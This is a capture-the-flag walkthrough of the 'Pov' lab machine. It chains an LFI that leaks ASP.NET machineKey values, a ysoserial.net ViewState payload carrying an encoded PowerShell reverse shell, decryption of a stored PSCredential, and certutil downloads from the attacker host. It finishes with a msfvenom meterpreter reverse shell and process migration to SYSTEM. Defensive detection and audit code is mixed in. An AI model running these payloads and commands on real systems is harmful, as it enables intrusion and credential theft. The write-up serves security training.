Pov

External Enumeration

Add to /etc/hosts

10.129.45.174 Pov.htb

Nmap

nmap -sC -sV -T4 10.129.45.174

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-24 22:27 EST
Nmap scan report for 10.129.45.174
Host is up (0.033s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (80)

  • Contact us page is not set up

Directory Scan - No Useful Results (only static asset directories)

gobuster dir -u http://10.129.45.174 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

/CSS                  (Status: 301) [Size: 148] [--> http://10.129.45.174/CSS/]
/Img                  (Status: 301) [Size: 148] [--> http://10.129.45.174/Img/]
/JS                   (Status: 301) [Size: 147] [--> http://10.129.45.174/JS/]

Vhost Scan - Dev.Pov.htb

ffuf -w subdomains.lst -u http://10.129.45.174  -H 'Host: FUZZ.POV.htb' -fs 12330

dev                [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 1610ms]

Add to /etc/hosts

10.129.45.174 POV.htb dev.POV.htb

Checking Vhost - Dev.Pov.htb

http://dev.POV.htb

  • Stephen Fitz
  • Download CV Button

Capturing CV download with Burp

Using LFI Vulnerability in the CV Download

..././web.config

<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>
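
Two defensive points from this stage, as an added Python example (not code from the box or from this write-up): why a filter that strips `../` once lets `..././web.config` through while proper path resolution does not, and what an auditor should flag in the recovered web.config. The web root `/srv/portfolio` and the audit function are assumptions; the sample config mirrors the shape of the one above with the key material replaced by placeholders.

```python
import os
import xml.etree.ElementTree as ET

# Hypothetical web root for the CV download handler; the real path on the
# box is not on the page.
WEB_ROOT = "/srv/portfolio"


def naive_strip(user_path):
    """Bypassable filter: deletes '../' in a single pass. Removing the
    inner '../' from '..././web.config' leaves '../web.config' behind."""
    return user_path.replace("../", "")


def safe_resolve(user_path, base=WEB_ROOT):
    """Hardened alternative: resolve first, then require the result to
    stay under `base`. Returns the absolute path, or None if the request
    would leave the web root."""
    base_abs = os.path.abspath(base)
    target = os.path.abspath(os.path.join(base_abs, user_path))
    try:
        # commonpath also rejects '/srv/portfolio2', which a plain
        # startswith(base_abs) test would let through.
        inside = os.path.commonpath([base_abs, target]) == base_abs
    except ValueError:  # different drives on Windows
        inside = False
    return target if inside else None


# Constructed web.config in the shape of the one recovered from the box;
# the key material is replaced by placeholders.
WEB_CONFIG_SAMPLE = """<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" validationKey="PLACEHOLDER_VALIDATION_KEY" />
  </system.web>
</configuration>"""


def audit_machine_key(web_config_xml):
    """Flag static machineKey material (readable by any file-read bug and
    sufficient to forge ViewState) and a legacy MAC algorithm."""
    findings = []
    mk = ET.fromstring(web_config_xml).find("./system.web/machineKey")
    if mk is None:
        return findings  # ASP.NET default: keys auto-generated per app pool
    for attr in ("decryptionKey", "validationKey"):
        value = mk.get(attr, "")
        if value and not value.startswith("AutoGenerate"):
            findings.append(f"static {attr} in web.config")
    algo = mk.get("validation", "")
    if algo.upper() in {"SHA1", "MD5", "3DES", "AES"}:
        findings.append(f"validation={algo}; HMACSHA256 or stronger recommended")
    return findings
```

Note that `safe_resolve("..././web.config")` on its own is harmless (`...` is just a directory name); the damage comes from the single-pass strip turning it into `../web.config` before the join. On the config side, static keys are sometimes needed (web farms), so the fix is to keep the file unreadable: encrypt the section with `aspnet_regiis -pe "system.web/machineKey"`, rotate the keys once they have been exposed, and move off SHA1.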

  • Creating malicious ViewState gadget to receive RCE

Using ysoserial.net

C:\Users\LABUser01\Desktop\ysoserial.net-master\ysoserial\bin\Debug>ysoserial.exe -p ViewState --examples
Try 'ysoserial -p ViewState --help' for more information.
Exmaples:

.NET Framework >= 4.5:
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo 123 > c:\windows\temp\test.txt" --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="AES" --decryptionkey="34C69D15ADD80DA4788E6E3D02694230CF8E9ADFDA2708EF43CAEF4C5BC73887" --validationalg="HMACSHA256" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0"

  • Create reverse shell with ysoserial
  • Using RevShell PowerShell #3 Base64

ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell -e 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" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"  --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

  • Malicious ViewState Shell

kdKQuCgdxD1JPLXuQ3DSikcURE%2F%2BxS%2FW%2BuAs121FX4lKyGrHIhkq5Jt6apbARFZuARh3EkdiUs0noZYTWQoIj60XuuuVzgrThNae9roOyNMh74yDe84uNPLMolbwaRdRLfHar15CN%2FJFUwy%2FA%2B1MlRzk0mnrcUTOvgo2xxjdRSmjam%2Fn9v5M1pPA2ewwzAX0AGIDBqLB7Ov43FfcW2chucjc4q%2FWCpzYzDRW3E1WSDsXjY4A7r1d0idE7AvWLFT659HqeARqNbxJbyUFgk1PysMhk0umAV1pMjZLKEptt1KXU7SjCFDaWSYKvovJwixaYkCiuuGarekZgtwrgEL3PqdjTre12Iw5Zs%2BtwgeduLALQ9DZQsEaMvgxJyLgodAu4i14qB%2F%2FxfDfQI8i5IKy1LLYFk9TNzvf3dp0f%2FHZyoJUvZuN7cPiDwBVwT3EIDtiSLejIEn3DQIdVitK5lMz6dJEoR9phvTvVlcTtmvXy%2FcDXE%2Brfo8RAZX7aoepFIgzWlOE4bci77b%2BLE2fIbJ8v2a7bd26VHa1OQ0vKUXvI1Eynw9mib2%2B7MJVLlY2b5XadGUegsLfzjNOXDVMdIU9qxEYn6sU9IOJAlJFiX9%2FEZkHfWHR%2Fu%2BvvyPhmujMxgLXFCS79OwF%2F%2FLzyB6rpo8kZ7Wt4RxvtYky1sELjk8QxENwYw6RLCcz2hZ2RSHjjHG3PicnjUjmFslZuKwlS337x5wIBkMDxRzxi71qvoEEN%2FtitxxaXrKptsH31nxShjqPqzeK0hrSKtipcqDmM7VKc7u6VXncmd6srlkCLBa5V1YKuobi0u8JJKCaxsRCEEhV9hHtn0v11mvH%2BYtpGt3yyWtw3EVr0%2BL3FybbUtOIBgqr4QQTcXi%2FU248MI7GUTzIltPx6sn%2FVG8yCcUQeVC%2BWmEKFUOh5e4eyMpWJ82h4JArAD0fn1yf0wIjeLDKkDBR%2Fm%2BSOb8FXk1nDndnynwy02FBueL47CA4VNj9YZv3X7eTiDyYVG6uLRCIjFdz6iYd7wfs0MM7EZuG%2Bdl3wdrEMGoVdCL3pUttFUYxo9ENxHtMpvvaGAKFxKBTXtDyDSxXVTSXVpzbNRVpFiPCS%2BCkkSE71ee%2BrV1saCDcTj1YqEX9ylI4sEGQrgNZzcfhRiIOZpNzejOnPjKyYlSMLaLOh%2FlrudaXvh6YcleUvt0lhrmPSwy5BBNzhhUKhzt0o7yRHgAf%2BtrcJzxNTF%2FzZOQ5FMEiir4sK0QwFCzRkbccFyuYwgB%2BuhH9Z8VlTr5WlbRgXyIa%2FT9cDYfPrmd1gonLQ1gtPi6E7jM489CcPG%2BHEmLB5I%2F02GdljGcmrtTQ0j3ogyoNsV1F%2BNbeF8G37N59ZR040dIQHycsPxzMjuOFkr217vUG6ICiGbD6ZXM%2B0hHvs6ZtTfHKu7O4ABFUp4rj2JQ6NhDBUU72EvjoZLeTtPv5KgRzcuqMZtggjh80QLcRwU%2FdUevPEEseR8Zx5S%2B0UAIlr4eq9AsTc8%2F%2FZXAAk5mmiVcec5W9IqkuZvgHN2OlMVNNeNwSgMky8uXEqy7Yg5uVgea7kszVWDDUai2MdxKR7zcpXyPH83VLs3%2Bdwq54kd%2BaCPXym1rX5JrL5NY3okZGOuQrB9XxzfuxfGP4%2FgeFhTJMNKozfS22pX3jE3QI2OcJrdQfzs%2FquSV78sLfCh7Rf5J4rtYiTdz39mEoEFDIwdLZEEQhCkT%2Bw6hclrTmYTbHSsh5tt3rQfN%2BReso1R0%2BfRKtdKgTcc4eM%2FBlEsuQNotLeB2zzhvWG51oFOxqT1jpUUjtGe90xAY5QCCM0OtqYOXzTdOCUtQf8Rcgg359Pj3i%2BBMzuPhy9wKWq727ngnefWjLLdFlLl49j3Wsral2VkWMWEa77Z
B%2BGBN4Flfpfy0h3s3if3kyI0QmaPYXMaEUEBpE6MzdKskupaBFPV2QuKnTkiw1lvUlW5lRd8YjGQWNC2bHviDMuMuVXn%2FqfNPwRwnxw2J%2BnbYSH8kkdLM7jB7IUeCfn1NOPWk%2BfYoGFsmSbivF%2FzjvrO9tqhEeJ1UN%2FM7OYMxhq4OLW0wEA4GU37azMDANOBWEjH1edD84C384cWNwzAmAFmoYETEDeMhPO9u3I%2F6humBwUwsma4X26NM%2FAySUbZeC8CdOcFuNTF1%2BSkmad8bDnZPmjfSG5gDBdf%2B2eDPVNn%2BAym%2FpcD4DrkmgfkSGl62zfnPE1l31%2FyS4%2F4D%2F3Mkq%2BVs4nUJbHyP6F9br2er%2FeblwJXDEgpts45ZqlnT4MP%2B6E9%2FXhS0F6vyCJ78QBz8rys2ClIdNecSV571WP8hvEFfY22qIPVzVgCNNLoiLEgQkaMULRbJ0sZBUzsroE1J0LwPbDXEmlGPJc%2FFEsbSoEnze2OVIex7MCvl%2Fso1m6Vp2jxpGZQgEX1Ec%2F9q7eybQiVsEdjn3wrL8NYGU5On9gGSc1NC2M%2BzBIMQgoXVzr9YznkbuG04lRGL58%2FRdhIV5XRKU0PMdtc7jlshU5LeN1Tpi9HYKWyxUzkbF4GbeQJzOrcGYb5Ubnv1v877ThBJvLCBpjwpgFSYb%2BtkTE64F5DO3UOwRIdbasQXnApQPS8ULkn8SutleDiMBXS6qEsfmtZfrI0%2F%2BY3glyJDcqIteaLD7TjXDedNYOb3MmRoDepi5xGTPnVBvgzwCvfeKHdGnUjictGwI4XO%2F3XI%2FIrXLardyO%2Fomx7Jqt%2B%2F3fKQFN7h6XsqcOUDm6HOoLit5b3YPPyhOj14J5AGAGCYm7mVvGwr7xfriC1YUbbWs7wbOGE0umMKtx8oFok07qPWf9%2FAT3bfD5NCeXMhofjnxoMVSdPeHt%2Bws2dj2CtFuKukTRE0ytUa6owMn0vkQNd1B5kwGuwJFeFw6O8NcvDvEwY9Jes9fwbgE57jhNImONLLr974uc3CVa6M%2FKDlS2tZ8ri%2B7QEPO7%2FHkFAMF5KaTpn3P9NyE0uPl5dEJX8QzmIvEmd0u0FKbFSSJERmtGtaZvOt1dLVsZdrtsiBi9IyTt9K0yVMUgJqA%2FWMljaDQMrljR%2BH4XSNlsM1Qi9hPWIrduLSW8jtkU7bwrUvdmg%3D%3D
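
From the defender's side, a forged ViewState that passes MAC validation leaves no verification-failure event, so the reliable signal is the process tree: the IIS worker (w3wp.exe) spawning cmd.exe or PowerShell, here with an encoded command line. The following is an added Python example (not from the write-up) that walks constructed Sysmon Event ID 1 style records; the PIDs, image paths and base64 string are placeholders.

```python
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_WORKERS = {"w3wp.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a long base64 token
ENCODED = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")

# Constructed process-creation records (Sysmon Event ID 1 field names).
# The base64 value is a placeholder, not the payload used on the box.
B64 = "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQAwAA=="
SAMPLE_EVENTS = [
    {"ProcessId": 3120, "ParentProcessId": 1500,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'c:\windows\system32\inetsrv\w3wp.exe -ap "PortfolioPool"'},
    {"ProcessId": 4800, "ParentProcessId": 3120,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": f"cmd /c powershell -e {B64}"},
    {"ProcessId": 4976, "ParentProcessId": 4800,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell -e {B64}"},
    # Benign: an interactive user opening PowerShell from Explorer.
    {"ProcessId": 2100, "ParentProcessId": 2000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_web_worker_shells(events, max_depth=4):
    """Return (pid, reason) for every shell whose ancestry, as far as this
    batch records it, reaches an IIS worker process."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["Image"]) not in SHELLS:
            continue
        # Check the recorded parent image first, then walk up through any
        # ancestors present in the same batch (cmd -> w3wp, etc.).
        hit = basename(e["ParentImage"]) in WEB_WORKERS
        pid, depth = e["ParentProcessId"], 0
        while not hit and pid in by_pid and depth < max_depth:
            hit = basename(by_pid[pid]["Image"]) in WEB_WORKERS
            pid = by_pid[pid]["ParentProcessId"]
            depth += 1
        if hit:
            reason = "shell descended from IIS worker process"
            if ENCODED.search(e["CommandLine"]):
                reason += "; encoded PowerShell command line"
            alerts.append((e["ProcessId"], reason))
    return alerts
```

The same logic applies to Security 4688 events once command-line auditing is enabled. In a hardened deployment w3wp.exe rarely has a legitimate reason to launch a shell at all, so the parent/child rule can be strict; the encoded-command check only adds severity.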

Gaining Shell as sfitz

Checking Privileges

PS C:\Users\sfitz\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Checking Listening Ports and Connections

PS C:\Users\sfitz\Documents> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       872
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       888
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1408
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       620
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       628
  TCP    10.129.230.183:139     0.0.0.0:0              LISTENING       4
  TCP    10.129.230.183:49671   10.10.14.128:4444      ESTABLISHED     4976

PS C:\Users\sfitz\Documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>

  • Username alaading

Creating PS Credential

$pwd = ConvertTo-SecureString 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

  • Building the credential object

PS C:\Users\sfitz\Documents> $cred = New-Object System.Management.Automation.PSCredential("alaading", $pwd)
PS C:\Users\sfitz\Documents> $cred

UserName                     Password
--------                     --------
alaading System.Security.SecureString

  • Getting Clear Text Password

PS C:\Users\sfitz\Documents> $cred.GetNetworkCredential().password
f8gQ8fynP44ek1m3

alaading:f8gQ8fynP44ek1m3
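
The connection.xml above is an Export-Clixml PSCredential. Its <SS> value is a SecureString protected with DPAPI in the user's scope, which is why the same account can turn it back into plaintext with nothing but ConvertTo-SecureString. The following is an added Python example (not from the write-up) that locates such exports and tells a DPAPI-protected blob from other encodings; the sample file, user name and blob body are constructed placeholders.

```python
import xml.etree.ElementTree as ET
from pathlib import Path

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# CryptProtectData blob header (version 1 + DPAPI provider GUID); this is
# what ConvertFrom-SecureString emits when no -Key is supplied.
DPAPI_HEADER = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# Constructed Export-Clixml output in the shape of connection.xml; the
# user name and the bytes after the header are placeholders.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">svc_example</S>
      <SS N="Password">{DPAPI_HEADER}01000000{"00" * 16}</SS>
    </Props>
  </Obj>
</Objs>"""


def find_exported_credentials(xml_text):
    """Return one record per serialized PSCredential: the user name and
    how the password is protected ('dpapi-user' or 'other')."""
    root = ET.fromstring(xml_text)
    found = []
    for obj in root.iter(f"{PS_NS}Obj"):
        types = {t.text for t in obj.findall(f"{PS_NS}TN/{PS_NS}T")}
        if "System.Management.Automation.PSCredential" not in types:
            continue
        user = obj.findtext(f"{PS_NS}Props/{PS_NS}S[@N='UserName']")
        ss = obj.findtext(f"{PS_NS}Props/{PS_NS}SS[@N='Password']") or ""
        protection = "dpapi-user" if ss.lower().startswith(DPAPI_HEADER) else "other"
        found.append({"user": user, "protection": protection})
    return found


def scan_tree(directory):
    """Walk a directory for *.xml files that hold serialized credentials.
    Export-Clixml may write UTF-16 with a BOM, so decode accordingly."""
    results = []
    for path in Path(directory).rglob("*.xml"):
        try:
            raw = path.read_bytes()
        except OSError:
            continue
        text = raw.decode("utf-16") if raw.startswith(b"\xff\xfe") else raw.decode("utf-8-sig", "ignore")
        if "PSCredential" not in text:
            continue
        try:
            for cred in find_exported_credentials(text):
                results.append({"file": str(path), **cred})
        except ET.ParseError:
            continue
    return results
```

A 'dpapi-user' hit means the secret is recoverable by anyone who can run code as the account that exported it on that host, which is exactly the position the IIS shell as sfitz provided. Treat every such file as a disclosed credential for the user it names, rotate it, and remove the export.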

  • Getting Shell as alaading

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {powershell -e 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}

Gaining Shell as alaading - User Flag

PS C:\Users\alaading\Documents> whoami
pov\alaading

type C:\Users\alaading\Documents\Desktop\user.txt
fcb23d2b6d437380eedda77ca1e9b039

Checking Privileges

PS C:\Users\alaading\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

  • Compiling / Transferring

# compile on Windows VM
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs

python3 -m http.server

certutil.exe -urlcache -f http://10.10.14.128:8000/RunasCs.exe RunasCs.exe

nc -nvlp 9001
./RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.14.128:9001

  • SeDebugPrivilege is now enabled

$ nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.230.183 49690
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Enabled 
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Attacking SeDebugPrivilege

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.128 LPORT=4000 -f exe > revshell.exe

certutil.exe -urlcache -f http://10.10.14.128:8000/revshell.exe revshell.exe

msfconsole -q
use multi/handler
set LHOST tun0
set LPORT 4000
set payload windows/x64/meterpreter/reverse_tcp
run

./revshell.exe
tasklist
winlogon.exe                   536 Console                    1     16,232 K

Obtaining Root Shell - Root Flag

(Meterpreter 18)(C:\users\alaading\Desktop) > migrate 536
[*] Migrating from 4648 to 536...
[*] Migration completed successfully.

(Meterpreter 18)(C:\Users\Administrator\Desktop) > cat root.txt
19e1120c2dbf1e4f1006c079d5da3496
